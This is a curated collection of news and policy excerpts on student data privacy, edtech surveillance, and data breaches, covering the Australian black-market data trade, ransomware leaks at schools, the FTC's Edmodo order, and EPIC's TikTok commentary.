“The conversation the industry wants us to have is: What’s the harm?” he added. “The right conversation, the ethical conversation is: What’s the need? Why does a fourth-grader need to be tracked by a third-party vendor to learn math?”

 

 

Abby Rufer, a high school algebra teacher in Dallas, said she’s worked with a few of the tested apps and many others during a frustratingly complicated two years of remote education.

School districts felt pressured during the pandemic to quickly replace the classroom with online alternatives, she said, but most teachers didn’t have the time or technical ability to uncover how much data they gobbled up.

“If the school is telling you to use this app and you don’t have the knowledge that it might be recording your students’ information, that to me is a huge concern,” Rufer said.

Many of her students are immigrants from Latin America or refugees from Afghanistan, she said, and some are already fearful of how information on their locations and families could be used against them.

“They’re being expected to jump into a world that is all technological,” she said, “and for many of them it’s just another obstacle they’re expected to overcome.” 

 

For original post, please visit: 
https://www.washingtonpost.com/technology/2022/05/24/remote-school-app-tracking-privacy/ 

Rocio Liliana Rosas De Silva's curator insight, May 28, 2024 7:29 PM
Some educational tools that they recommend for school districts, there it mentions that the covid opened doors to this new era, on this website you can check what the benefits of studying remotely are.
Scooped by Roxana Marachi, PhD
November 27, 2022 6:53 PM
Scoop.it!

Cyber black market selling hacked ATO and MyGov logins shows Medibank and Optus only tip of iceberg // ABC News

Cyber black market selling hacked ATO and MyGov logins shows Medibank and Optus only tip of iceberg // ABC News | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Sean Rubinsztein-DunlopEcho HuiSarah Curnow and Kevin Nguyen

 

"The highly sensitive information of millions of Australians — including logins for personal Australian Tax Office accounts, medical and personal data of thousands of NDIS recipients, and confidential details of an alleged assault of a Victorian school student by their teacher — is among terabytes of hacked data being openly traded online.

 

An ABC investigation has identified large swathes of previously unreported confidential material that is widely available on the internet, ranging from sensitive legal contracts to the login details of individual MyGov accounts, which are being sold for as little as $1 USD.

 

The huge volume of newly identified information confirms the high-profile hacks of Medibank and Optus represent just a fraction of the confidential Australian records recently stolen by cyber criminals.

 

At least 12 million Australians have had their data exposed by hackers in recent months.

It can also be revealed many of those impacted learnt they were victims of data theft only after being contacted by the ABC.

 

They said they were either not adequately notified by the organisations responsible for securing their data, or were misled as to the gravity of the breach.

 

The highly sensitive information of millions of Australians — including logins for personal Australian Tax Office accounts, medical and personal data of thousands of NDIS recipients, and confidential details of an alleged assault of a Victorian school student by their teacher — is among terabytes...

 

One of the main hubs where stolen data is published is a forum easily discoverable through Google, which only appeared eight months ago and has soared in popularity — much to the alarm of global cyber intelligence experts.

 

Anonymous users on the forum and similar websites regularly hawk stolen databases collectively containing millions of Australians' personal information.

 

Others were seen offering generous incentives to those daring enough to go after specific targets, such as one post seeking classified intelligence on the development of Australian submarines.

 

"There's a criminal's cornucopia of information available on the clear web, which is the web that's indexed by Google, as well as in the dark web," said CyberCX director of cyber intelligence Katherine Mansted.

 

"There's a very low barrier of entry for criminals … and often what we see with foreign government espionage or cyber programs — they're not above buying tools or buying information from criminals either."

 

In one case, law student Zac's medical information, pilfered in one of Australia's most troubling cyber breaches, was freely published by someone without a clear motive.

 

Zac has a rare neuromuscular disorder which has left him unable to walk and prone to severe weakness and fatigue. The ABC has agreed not to use his full name because he fears the stolen information could be used to locate him.

 

His sensitive personal data was stolen in May in a cyber attack on CTARS, a company that provides a cloud-based client management system to National Disability Insurance Scheme (NDIS) and NSW out-of-home-care service providers.

 

The National Disability Insurance Agency (NDIA), which is responsible for the NDIS, told a Senate committee it had confirmed with CTARS that all 9,800 affected participants had been notified. 

 

But ABC Investigations has established this is not the case. The ABC spoke with 20 victims of the breach, all but one — who later found a notice in her junk mail — said they had not received a notification or even heard of the hack.

 

The leaked CTARS database, verified by the ABC, included Medicare numbers, medical information, tax file numbers, prescription records, mental health diagnoses, welfare checks, and observations about high-risk behaviour such as eating disorders, self-harm and suicide attempts.

 

"It's really, really violating," said Zac, whose leaked data included severe allergy listings for common food and medicine,

"I may not like to think of myself as vulnerable … but I guess I am quite vulnerable, particularly living alone.

"Allergy records, things that are really sensitive, [are kept] private between me and my doctor and no one else but the people who support me.

 

"That's not the sort of information that you want getting into the wrong hands, particularly when ... you don't have a lot of people around you to advocate for you."

 

The CTARS database is just one of many thousands being traded on the ever-growing cybercrime black market. These postings appear on both the clear web — used everyday through common web browsers — and on the dark web which requires special software for access.

 

The scale of the problem is illustrated by the low prices being demanded for confidential data.

ABC Investigations found users selling personal information and log-in credentials to individual Australian accounts which included MyGov, the ATO and Virgin Money for between $1 to $10 USD.

 

MyGov and ATO services are built with two-factor authentication, which protects accounts with compromised usernames and passwords, but those same login details could be used as a means to bypass less-secure services.

 

One cyber intelligence expert showed the ABC a popular hackers forum, in which remote access to an Australian manufacturing company was auctioned for up to $500. He declined to identify the company.

CyberCX's Ms Mansted said the "black economy" in stolen data and hacking services was by some measures the third largest economy in the world, surpassed only by the US and Chinese GDP.

"The cost of buying a person's personal information or buying access to hack into a corporation, that's actually declining over time, because there is so much information and so much data out there," said Ms Mansted. 

 

Cyber threat investigator Paul Nevin monitors online forums where hundreds of Australians' login data are traded each week.

"The volume of them was staggering to me," said Mr Nevin, whose company Cybermerc runs surveillance on malicious actors and trains Australian defence officials.

 

"In the past, we'd see small scatterings of accounts but now, this whole marketplace has been commoditised and fully automated.

 

"The development of that capability has only been around for a few years but it shows you just how successful these actors are at what they do."

Explosive details leaked about private school


The cyber attack on Medibank last month by Russian criminal group REvil brought home the devastation cyber crime can inflict.

The largest health insurer in the country is now facing a possible class action lawsuit after REvil accessed the data of 9.7 million current and former customers, and published highly sensitive medical information online.

 

On the dark web, Russian and Eastern European criminal organisations host sites where they post ransom threats and later leak databases if the ransom is not paid.

 

The groups research their targets to inflict maximum damage. Victims range from global corporations, including defence firm Thales and consulting company Accenture, to Australian schools. 

 

In Melbourne, the Kilvington Grammar School community is reeling after more than 1,000 current and former students had their personal data leaked in October by a prolific ransomware gang, Lockbit 3.0. 

 

The independent school informed parents via emails, including one on November 2 that stated an "unknown third party has published a limited amount of data taken from our systems". 

Correspondence sent to parents indicated this "sensitive information" included contact details of parents, Medicare details and health information such as allergies, as well as some credit card information.

However, the cache of information actually published by Lockbit 3.0 was far more extensive than initially suggested.

ABC Investigations can reveal the ransomware group published highly confidential documents containing the bank account numbers of parents, legal and debt disputes between the school and families, report cards, and individual test results.

Most shocking was the publication of details concerning the investigation into a teacher accused of assaulting a child and privileged legal advice about the death of a student.

 

Kilvington Grammar has been at the centre of a coronial inquest into Lachlan Cook, 16, who died after suffering complications of Type 1 diabetes during a school trip to Vietnam in 2019.

 

Lachlan became critically ill and started vomiting, which was mistaken for gastroenteritis rather than a rare complication of his diabetes.

 

The coroner has indicated she will find the death was preventable because neither the school nor the tour operator, World Challenge, provided specific care for the teenager's diabetes. 

 

Lachlan's parents declined to comment, but ABC Investigations understands they did not receive notification from the school that sensitive legal documents about his death were stolen and published online.

 

Other parents whose details were compromised told the ABC they were frustrated by the school's failure to explain the scale of the breach.

 

"That's distressing that this type of data has been accessed," said father of two, Paul Papadopoulos.

 

"It's absolutely more sensitive [than parents were told] and I think any person would want to have known about it." 

 

In a statement to the ABC, Kilvington Grammar did not address specific questions about the Cook family tragedy nor if any ransom was demanded or paid.

 

The school's marketing director Camilla Fiorini acknowledged its attempt to notify families of the specifics of what personal data was stolen was an "imperfect process". 

 

"We have adopted a conservative approach and contacted all families that may have been impacted," she said.

 

"We listed — to the best of our abilities —  what data had been accessed ... we also suggested additional steps those individuals can consider taking to further protect their information.

 

"The school is deeply distressed by this incident and the impact it has had on our community." 

 

Other Australian organisations recently targeted by Lockbit 3.0 included a law firm, a wealth management firm for high-net-worth individuals, and a major hospitality company.

Blame game leaves victims out in the cold

The failure of Kilvington Grammar to properly notify the victims of the data-theft is not an isolated case and its targeting by a ransomware group is emblematic of a growing apparatus commoditising stolen personal information.

 

Australian Federal Police (AFP) Cybercrime Operations Commander Chris Goldsmid, told the ABC  personal data was becoming "increasingly valuable to cybercriminals who see it as information they can exploit for financial gain".

 

"Cybercriminals can now operate at all levels of technical ability and the tools they employ are easily accessible online," he warned.

 

He added the number of cybercrime incidents has risen 13 per cent from the previous financial year, to 67,500 reports — likely a conservative figure.

 

"We suspect there are many more victims but they are too embarrassed to come forward, or they have not realised what has happened to them is a crime,"

 

Commander Goldsmid said.

While authorities and the Federal Government have warned Medibank customers to be on high-alert for identity thieves, many other Australians are unaware they are victims.

 

Under the Privacy Act, all government agencies, organisations that hold health information and companies with an annual turnover above $3 million are required to notify individuals when their data has been breached if it is deemed "likely to cause serious harm".

 

After CTARS was hacked in May, the company published a statement about the hack on its website but devolved its responsibility to inform its NDIS recipients to 67 individual service providers affected by the breach.

When ABC Investigations asked CTARS why many of the impacted NDIS recipients were not notified, it said it decided the processes was best handled by each provider.

"The OAIC [Office of the Australian Information Commissioner] suggests that notifications are usually best received from the organisation who has a relationship with impacted individuals — in this case, the service providers," a CTARS spokesperson said.

 

"CTARS worked extensively to support the service providers in being able to ... bring the notification to their clients' attention."

 

However, the NDIA told the ABC this responsibility lay not with those individual providers, but with CTARS.

 

"The Agency's engagement with CTARS following the breach, indicated that CTARS was fulfilling all its obligations under the Privacy Act in relation to the breach," an NDIA spokesperson said.

"The Agency has reinforced with CTARS its obligation to inform users of their services."

 

This has provided little comfort to Zac and other CTARS victims whose personal information may never be erased from the internet.

 

"It's infuriating, it's shocking and it's disturbing," said Zac.

 

"It makes me really angry to know that multiple government agencies and these private support companies, who I would have thought would be duty bound to hold my best interests at heart … especially when my safety is at risk … that they at no level attempted to get in contact with me and assist me in protecting my information."

 

Zac's former service provider, Southern Cross Support Services, did not respond to the ABC's questions.

 

A victim of another hack published on the same forum as the CTARS data is Karen Heath.

 

The Victorian woman has been the victim of two hacks in the past month, one of Optus' customer data and another of confidential information stored by MyDeal, which is owned by retail giant Woolworths Group. 

 

Woolworths told the ABC it has "enhanced" its security and privacy practices operations since the MyDeal hack and it "unreservedly apologise[d] for the considerable concern the MyDeal breach has caused". 

 

But Ms Heath remains anxious.

"You feel a bit helpless [and] you get worried about it," Ms Heath said.

 

"I don't even know that I'll shop at Woolworths again ... they own MyDeal. They have insurance companies, they have all sorts of things.

 

"So where does it end?"

 

For original post, please visit: 

https://amp.abc.net.au/article/101700974 

 
No comment yet.
Scooped by Roxana Marachi, PhD
May 19, 2022 7:10 PM
Scoop.it!

Policy Statement of the Federal Trade Commission on Education Technology // FTC

https://www.ftc.gov/system/files/ftc_gov/pdf/Policy%20Statement%20of%20the%20Federal%20Trade%20Commission%20on%20Education%20Technology.pdf 

No comment yet.
Scooped by Roxana Marachi, PhD
September 6, 2022 9:22 PM
Scoop.it!

Instagram fined €405M for violating kids’ privacy // Politico

Instagram fined €405M for violating kids’ privacy // Politico | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it
The fine is the third for a Meta-owned company handed down by the Irish regulator.

 

https://www.politico.eu/article/instagram-fined-e405m-for-violating-kids-privacy/? 

No comment yet.
Scooped by Roxana Marachi, PhD
August 7, 2022 10:33 PM
Scoop.it!

Digital Game-Based Learning: Foundations, Applications, and Critical Issues // Earl Aguilera and Roberto de Roock, 2022 // Education 

Digital Game-Based Learning: Foundations, Applications, and Critical Issues // Earl Aguilera and Roberto de Roock, 2022 // Education  | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Earl Aguilera and Roberto de Roock

https://doi.org/10.1093/acrefore/9780190264093.013.1438

 

Summary
"As contemporary societies continue to integrate digital technologies into varying aspects of everyday life—including work, schooling, and play—the concept of digital game-based learning (DGBL) has become increasingly influential. The term DGBL is often used to characterize the relationship of computer-based games (including games played on dedicated gaming consoles and mobile devices) to various learning processes or outcomes. The concept of DGBL has its origins in interdisciplinary research across the computational and social sciences, as well as the humanities. As interest in computer games and learning within the field of education began to expand in the late 20th century, DGBL became somewhat of a contested term. Even foundational concepts such as the definition of games (as well as their relationship to simulations and similar artifacts), the affordances of digital modalities, and the question of what “counts” as learning continue to spark debate among positivist, interpretivist, and critical framings of DGBL. Other contested areas include the ways that DGBL should be assessed, the role of motivation in DGBL, and the specific frameworks that should inform the design of games for learning.

Scholarship representing a more positivist view of DGBL typically explores the potential of digital games as motivators and influencers of human behavior, leading to the development of concepts such as gamification and other uses of games for achieving specified outcomes, such as increasing academic measures of performance, or as a form of behavioral modification. Other researchers have taken a more interpretive view of DGBL, framing it as a way to understand learning, meaning-making, and play as social practices embedded within broader contexts, both local and historical. Still others approach DGBL through a more critical paradigm, interrogating issues of power, agency, and ideology within and across applications of DGBL. Within classrooms and formal settings, educators have adopted four broad approaches to applying DGBL: (a) integrating commercial games into classroom learning; (b) developing games expressly for the purpose of teaching educational content; (c) involving students in the creation of digital games as a vehicle for learning; and (d) integrating elements such as scoreboards, feedback loops, and reward systems derived from digital games into non-game contexts—also referred to as gamification.

Scholarship on DGBL focusing on informal settings has alternatively highlighted the socially situated, interpretive practices of gamers; the role of affinity spaces and participatory cultures; and the intersection of gaming practices with the lifeworlds of game players.As DGBL has continued to demonstrate influence on a variety of fields, it has also attracted criticism. Among these critiques are the question of the relative effectiveness of DGBL for achieving educational outcomes. Critiques of the quality and design of educational games have also been raised by educators, designers, and gamers alike. Interpretive scholars have tended to question the primacy of institutionally defined approaches to DGBL, highlighting instead the importance of understanding how people make meaning through and with games beyond formal schooling. Critical scholars have also identified issues in the ethics of DGBL in general and gamification in particular as a form of behavior modification and social control. These critiques often intersect and overlap with criticism of video games in general, including issues of commercialism, antisocial behaviors, misogyny, addiction, and the promotion of violence. Despite these criticisms, research and applications of DGBL continue to expand within and beyond the field of education, and evolving technologies, social practices, and cultural developments continue to open new avenues of exploration in the area."

 

To access original article, please visit:
https://doi.org/10.1093/acrefore/9780190264093.013.1438

No comment yet.
Scooped by Roxana Marachi, PhD
July 18, 2023 7:53 PM
Scoop.it!

Securly Sued Over Surveillance of Students on School Chromebooks // 7/17/23

Securly Sued Over Surveillance of Students on School Chromebooks // 7/17/23 | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

Securly Sued Over Surveillance of Students on School Chromebooks - by Christopher Brown

https://news.bloomberglaw.com/privacy-and-data-security/securly-sued-over-surveillance-of-students-on-school-chromebooks 

 

Court case docket - public complaint file

https://www.bloomberglaw.com/public/desktop/document/BateetalvSecurlyIncDocketNo323cv01304SDCalJul172023CourtDocket?doc_id=X6CKD5LOJEB9EMRO1KU3RFCR8K7

No comment yet.
Scooped by Roxana Marachi, PhD
September 17, 2022 11:48 AM
Scoop.it!

Report – Hidden Harms: The Misleading Promise of Monitoring Students Online // Center for Democracy and Technology 

Report – Hidden Harms: The Misleading Promise of Monitoring Students Online // Center for Democracy and Technology  | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Elizabeth Laird, Hugh Grant-Chapman, Cody Venzke, Hannah Quay-de la Vallee

 

"The pressure on schools to keep students safe, especially to protect them physically and support their mental health, has never been greater. The mental health crisis, which has been exacerbated by the COVID-19 pandemic, and concerns about the increasing number of school shootings have led to questions about the role of technology in meeting these goals. From monitoring students’ public social media posts to tracking what they do in real-time on their devices, technology aimed at keeping students safe is growing in popularity. However, the harms that such technology inflicts are increasingly coming to light. 

 

CDT conducted survey research among high school students and middle and high school parents and teachers to better understand the promise of technologies aimed at keeping students safe and the risks that they pose, as reported by those most directly interacting with such tools. In particular, the research focused on student activity monitoring, the nearly ubiquitous practice of schools using technology to monitor students’ activities online, especially on devices provided by the school. CDT built on its previous research, which showed that this monitoring is conducted primarily to comply with perceived legal requirements and to keep students safe. While stakeholders are optimistic that student activity monitoring will keep students safe, in practice it creates significant efficacy and equity gaps: 

  • Monitoring is used for discipline more often than for student safety: Despite assurances and hopes that student activity monitoring will be used to keep students safe, teachers report that it is more frequently used for disciplinary purposes in spite of parent and student concerns. 

  • Teachers bear considerable responsibility but lack training for student activity monitoring: Teachers are generally tasked with responding to alerts generated by student activity monitoring, despite only a small percentage having received training on how to do so privately and securely. 

  • Monitoring is often not limited to school hours despite parent and student concerns: Students and parents are the most comfortable with monitoring being limited to when school is in session, but monitoring frequently occurs outside of that time frame. 

  • Stakeholders demonstrate large knowledge gaps in how monitoring software functions: There are significant gaps between what teachers report is communicated about student activity monitoring, often via a form provided along with a school-issued device, and what parents and students retain and report about it. 

Additionally, certain groups of students, especially those who are already more at risk than their peers, disproportionately experience the hidden harms of student activity monitoring: 

  • Students are at risk of increased interactions with law enforcement: Schools are sending student data collected from monitoring software to law enforcement officials, who use it to contact students. 

  • LGBTQ+ students are disproportionately targeted for action: The use of student activity monitoring software is resulting in the nonconsensual disclosure of students’ sexual orientation and gender identity (i.e., “outing”), as well as more LGBTQ+ students reporting they are being disciplined or contacted by law enforcement for concerns about committing a crime compared to their peers. 

  • Students’ mental health could suffer: While students report they are being referred to school counselors, social workers, and other adults for mental health support, they are also experiencing detrimental effects from being monitored online. These effects include avoiding expressing their thoughts and feelings online, as well as not accessing important resources that could help them. 

  • Students from low-income families, Black students, and Hispanic students are at greater risk of harm: Previous CDT research showed that certain groups of students, including students from low-income families, Black students, and Hispanic students, rely more heavily on school-issued devices. Therefore, they are subject to more surveillance and the aforementioned harms, including interacting with law enforcement, being disciplined, and being outed, than those using personal devices. 


Given that the implementation of student activity monitoring falls short of its promises, this research suggests that education leaders should consider alternative strategies to keep students safe that do not simultaneously put students’ safety and well-being in jeopardy.


See below for our complete report, summary brief, and in-depth research slide deck. For more information, see our letter calling for action from the U.S. Department of Education’s Office for Civil Rights — jointly signed by multiple civil society groups — as well as our related press release and recent blog post discussing findings from our parent and student focus groups.

Read the full report here.

Read the summary brief here.

Read the research slide deck here.

 
 
No comment yet.
Scooped by Roxana Marachi, PhD
May 22, 2023 9:32 PM
Scoop.it!

FTC Says EdTech Provider Edmodo Unlawfully Used Children’s Personal Information for Advertising and Outsourced Compliance to School Districts

FTC Says EdTech Provider Edmodo Unlawfully Used Children’s Personal Information for Advertising and Outsourced Compliance to School Districts | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

"The Federal Trade Commission has obtained an order against education technology provider Edmodo for collecting personal data from children without obtaining their parent’s consent and using that data for advertising, in violation of the Children’s Online Privacy Protection Act Rule (COPPA Rule), and for unlawfully outsourcing its COPPA compliance responsibilities to schools. 

Under the proposed order, filed by the Department of Justice on behalf of the FTC, Edmodo, Inc. will be prohibited from requiring students to hand over more personal data than is necessary in order to participate in an online educational activity. This is a first for an FTC order and is in line with a policy statement the FTC issued in May 2022 that warned education technology companies about forcing parents and schools to provide personal data about children in order to participate in online education. During the course of the FTC’s investigation, Edmodo suspended operations in the United States. The order, if approved by the court, will bind the company, including if it resumes U.S. operations.

“This order makes clear that ed tech providers cannot outsource compliance responsibilities to schools, or force students to choose between their privacy and education,” said Samuel Levine, Director of the FTC’s Bureau of Consumer Protection. “Other ed tech providers should carefully examine their practices to ensure they’re not compromising students’ privacy.”

In a complaint, also filed by DOJ, the FTC says Edmodo violated the COPPA Rule by failing to provide information about the company’s data collection practices to schools and teachers, and failing to obtain verifiable parental consent. The COPPA Rule requires online services and websites directed to children under 13 to notify parents about the personal information they collect and obtain verifiable parental consent for the collection and use of that information.

Until approximately September 2022, California-based Edmodo offered an online platform and mobile app with virtual class spaces to host discussions, share materials and other online resources for teachers and schools in the United States via a free and subscription-based service. The company collected personal information about students including their name, email address, date of birth and phone number as well as persistent identifiers, which it used to provide ads.

Under the COPPA Rule, schools can authorize collection of children’s personal information on behalf of parents. But a website operator must provide notice to the school of the operator’s collection, use and disclosure practices, and the school can only authorize collection and use of personal information for an educational purpose.

Edmodo required schools and teachers to authorize data collection on behalf of parents or to notify parents about Edmodo’s data collection practices and obtain their consent to that collection. Edmodo, however, failed to provide schools and teachers with the information they would need to comply in either scenario as required by the COPPA Rule, according to the complaint. For example, during the signup process for Edmodo’s free service, Edmodo provided minimal information about the COPPA Rule to teachers—providing only a link to the company’s terms of service and privacy policy, which teachers were not required to review before signing up for the company’s service.

Those teachers and schools that did read Edmodo’s terms of service were falsely told that they were “solely” responsible for complying with the COPPA Rule. The terms of service also failed to adequately disclose what personal information the company actually collects or indicate how schools or teachers should go about obtaining parental consent.

These failures led to the illegal collection of personal information from children, according to the complaint.

In addition, Edmodo could not rely on schools to authorize collection on behalf of parents because the company used the personal information it collected from children for a non-educational purpose—to serve advertising. For such commercial uses, the COPPA Rule required Edmodo to obtain consent directly from parents. 

Edmodo also violated the COPPA Rule by retaining personal information indefinitely until at least 2020 when it put in place a policy to delete the data after two years, according to the complaint. COPPA prohibits retaining personal information about children for longer than is reasonably necessary to fulfill the purpose for which it was collected.

In addition to violating the COPPA Rule, the FTC says Edmodo violated the FTC Act’s prohibition on unfair practices by relying on schools to obtain verifiable parental consent. Specifically, the FTC says that Edmodo outsourced its COPPA compliance responsibilities to schools and teachers while providing confusing and inaccurate information about obtaining consent. This is the first time the FTC has alleged an unfair trade practice in the context of an operator’s interaction with schools.

Proposed Order

The proposed order with Edmodo includes a $6 million monetary penalty, which will be suspended due to the company’s inability to pay. Other order provisions, which will provide protections for children’s data should Edmodo resume operations in the United States, include:

  • prohibiting Edmodo from conditioning a child’s participation in an activity on the child disclosing more information than is reasonably necessary to participate in such activity;

  • requiring the company to complete several requirements before obtaining school authorization to collect information from a child;

  • prohibiting the company from using children’s information for non-educational purposes such as advertising or building user profiles;

  • banning the company from using schools as intermediaries in the parental consent process;

  • requiring the company to implement and adhere to a retention schedule that details what information it collects, what the data is used for and a time frame for deleting it; and

  • requiring Edmodo to delete models or algorithms developed using personal information collected from children without verifiable parental consent or school authorization.

The Commission voted 3-0 to refer the civil penalty complaint and proposed federal order to the Department of Justice. The DOJ filed the complaint and stipulated order in the U.S. District Court for the Northern District of California.

NOTE: The Commission authorizes the filing of a complaint when it has “reason to believe” that the named defendant is violating or is about to violate the law and it appears to the Commission that a proceeding is in the public interest. Stipulated orders have the force of law when approved and signed by the District Court judge.

The lead FTC attorneys on this matter are Gorana Neskovic and Peder Magee from the FTC’s Bureau of Consumer protection.

The Federal Trade Commission works to promote competition and protect and educate consumers. Learn more about consumer topics at consumer.ftc.gov, or report fraud, scams, and bad business practices at ReportFraud.ftc.gov. Follow the FTC on social media, read consumer alerts and the business blog, and sign up to get the latest FTC news and alerts."

 

For original post, please visit: 

https://www.ftc.gov/news-events/news/press-releases/2023/05/ftc-says-ed-tech-provider-edmodo-unlawfully-used-childrens-personal-information-advertising?utm_source=govdelivery 

No comment yet.
Scooped by Roxana Marachi, PhD
May 2, 2023 9:57 PM
Scoop.it!

Ransomware Gang Claims Edison Learning Data Theft // THE Journal

Ransomware Gang Claims Edison Learning Data Theft // THE Journal | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Kristal Kuykendall 05/02/23

"The Royal Ransomware is claiming to have infiltrated public school management and virtual learning provider Edison Learning, posting on its dark web data leak site on Wednesday, April 26, that it had stolen 20GB of the company’s data “including personal information of employees and students” and threatening to post the data “early next week.”

Typically, when Royal and similar ransomware groups post such warnings, it indicates they have likely made a ransomware demand and may be in negotiations with the targeted organization, said cybersecurity expert Doug Levin, who is national director at K12 Security Information Exchange and sits on CISA’s Cybersecurity Advisory Committee

Edison Learning confirmed a cyber incident has occurred and said it could not divulge anything else. "Our investigation into this incident is ongoing, and we are unable to provide additional details at this time," Edison Learning Director of Communications Michael Serpe told THE Journal in an email. "We do not have any student data on impacted systems." 


Based in Fort Lauderdale, Florida, Edison Learning was founded in 1992 as the Edison Project to provide school management services for public charter schools and struggling districts in the United States and United Kingdom. 

According to an archived 2015 website page, Edison Learning has managed hundreds of schools in 32 states, serving millions of students over the years. A 2012 Edison Learning sales presentation found online by THE Journal states that during the 2009–2010 school year, the company’s services were providing schooling for 400,000 children in 25 states, the U.K., and the United Arab Emirates.

More recently, Edison Learning has expanded to provide virtual schooling for middle and high school students as well as CTE courses for high school students, social-emotional learning courses for middle and high school, and more. The company operates its own in-house learning management system, called eSchoolware, and on its website touts other services such as “management solutions, alternative education, personal learning plans, and turnaround services for underperforming schools.”

The Royal ransomware gang — whose tactics were the subject of a CISA cybersecurity advisory in March 2023 — wrote on its data leak site on the dark web: “Looks like knowledge providers missed some lessons of cyber security [sic]. Recently we gave one to EdisonLearning and they have failed.”

Levin at K12SIX said that while “occasionally, these groups list victims they didn’t actually compromise,” the opposite is true more often than not. For example, on Royal’s data leak site, scores of companies — including a handful of public school districts, community colleges, and universities — are listed as victims targeted since the beginning of this year, and many include links to the stolen data files for the respective victims, who presumably did not pay the ransom.... 

 

For full post, please visit: 

https://thejournal.com/articles/2023/05/01/ransomware-gang-claims-edison-learning-data-theft.aspx?s=the_nu_020523&oly_enc_id=8831J2755401H5M 

No comment yet.
Scooped by Roxana Marachi, PhD
March 27, 2023 2:39 PM
Scoop.it!

TikTok is Not the Only Problem // Electronic Privacy Information Center (EPIC)

TikTok is Not the Only Problem // Electronic Privacy Information Center (EPIC) | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Calli Schroeder, EPIC Senior Counsel and Caitriona Fitzgerald, EPIC Deputy Director

 

"The debate over the national security risk posed by the misuse of personal data, and whether a ban or restructuring of TikTok is a necessary policy intervention, has taken a new twist recently with the Biden administration now demanding that TikTok be sold from its Chinese parent company, ByteDance, and sold to a company based in the United States or face a potential ban in the U.S. The Committee on Foreign Investment in the U.S. (CFIUS) has been conducting a review of TikTok’s foreign ownership and national security concerns surrounding the company’s data processing over the past two years. The recent call by the Administration for separation or prohibition is the latest in a series of proposals to address the threats to national security posed by TikTok.  

The national security concerns voiced by the Administration and members of Congress have largely focused on three issues: 1) the amount and type of user data collected by TikTok; 2) Chinese security law allowing government access to Chinese company-held data on demand; and 3) the potential for the Chinese government to use the app to spread misinformation or censor information critical of China.  

TikTok, like most U.S. tech companies, collects a substantial amount of data about its users, which, according to TikTok’s privacy policy, may include name, age, phone number, email, approximate location, IP addresses, contact lists, messages, biometric identifiers (like face or voiceprints), keystroke patterns, and information gathered from interaction with the app, such as user-generated content, interests, preferences, and associated metadata. It also draws substantial inferences from this data to enrich its user profiles.  

There are concerns that this data could be used by the Chinese government in espionage and surveillance activities. China’s National Intelligence Law, Cybersecurity Law, and other components of the interconnected cybersecurity and law enforcement regulatory package allow the Chinese government broad license to require Chinese companies and citizens to “support, assist, and cooperate” with Chinese intelligence work. Since “intelligence work” remains undefined, this could potentially allow the Chinese government unfettered access to data held by any Chinese company. Should China access TikTok’s user data, there is concern that the information could be used to target individuals for blackmail or as potential spy recruits. There is no evidence that China has accessed this data to date and TikTok’s CEO stated that the company would refuse such requests, but the legal issues remain a concern. 

Finally, concerns have been raised that the Chinese government could use its access to TikTok’s inner workings to pressure the company into censoring content, removing content critical of Chinese government practices, or pushing propaganda, potentially influencing U.S. politics and society.  

Project Texas Proposal 

In the wake of executive orders issued by President Trump in 2020, TikTok drafted a proposal that they hoped would sufficiently address concerns about national security and prevent a ban or divestiture mandate. The plan, dubbed “Project Texas,” would shift certain functions to a U.S.-based TikTok subsidiary that would be governed by an independent board of directors reporting directly to CFIUS. Functions run by the subsidiary would include access to U.S. user data, content moderation, hiring and managing U.S. employees, and all other functions that require processing U.S. user data. Oracle would host this subsidiary, oversee all data transfers, and conduct assessments and security reviews of TikTok software. 

But Project Texas does not solve the privacy issues raised by TikTok’s collection and creation of detailed user profiles. Indeed, Oracle is one of the largest data brokers in the United States. Oracle “claims to sell data on more than 300 [million] people globally, with 30,000 data attributes per individual, covering ‘over 80 percent of the entire US internet population[.]’” In 2020, when the potential TikTok/Oracle partnership was announced, EPIC sent demand letters to Oracle and TikTok calling on Oracle to commit not to sell TikTok user data or merge it with Oracle products. Oracle refused to make such a commitment. The Project Texas proposal is insufficient to protect TikTok users or national security because exposes the weaknesses of a TikTok ban without the additional protections of a comprehensive privacy law. 

TikTok is just one app in a vast commercial surveillance ecosystem that has been allowed to grow unencumbered over the past two decades due to the lack of a U.S. privacy law. Even if the U.S. bans TikTok, millions of apps would continue to collect the most intimate details about us and profit off of them. The endless web of data brokers who buy and sell data would continue to exist, and foreign adversaries such as China could still obtain Americans’ personal data by simply purchasing it from data brokers on the open market. This is a data privacy crisis with serious national security implications and it is past time for Congress to act.  

Don’t Just Ban One, Regulate Them All: Enact Comprehensive Privacy Legislation 

Comprehensive privacy legislation such as the American Data Privacy and Protection Act (“ADPPA”) would go much farther to protect Americans’ personal data from bad foreign actors than a ban on one app. Here, we breakdown how the provisions of ADPPA would address the national security concerns being raised by lawmakers this week: 

  • Reduces the volume of personal data collected: The ADPPA’s baseline data minimization rule that requires companies to limit their data collection to what is reasonably necessary and proportionate to provide or maintain a product or service requested by the individual (or pursuant to certain enumerated purposes) will dramatically reduce the data points collected on all Americans. Data that is never collected in the first place cannot be misused, breached, or sold.
  • Limits the flow of personal data to data brokers: ADPPA’s limits on collection and disclosure would reduce the flow of personal data to data brokers, strengthening our national security by cutting of the source of many data sales to foreign adversaries. Additionally, the ADPPA directs the FTC to establish a centralized “Do Not Collect” mechanism. The strict limits on data brokers in ADPPA has led to a flood of lobbying by brokers pushing for weaker standards.  
  • Provides heightened protections for kids and teens. The data minimization rule is even stricter when it comes to sensitive data such as the personal data of minors under 17 years old. Collection of sensitive data is permitted only when strictly necessary and not permitted at all for advertising purposes. Targeted advertising to minors is banned. Strictly limiting the collection and use of the personal data of minors will make all apps safer for kids and teens.    
  • Algorithmic impact assessments. Under the ADPPA, large entities are required to conduct algorithmic impact assessments. These assessments must describe steps the entity has taken or will take to mitigate potential harms from algorithms, including any harms specifically related to individuals under 17 years of age and harms to civil rights. The assessments must be submitted to the Federal Trade Commission and to Congress by request. This will bring transparency to the content recommendation algorithms on TikTok and other apps. 
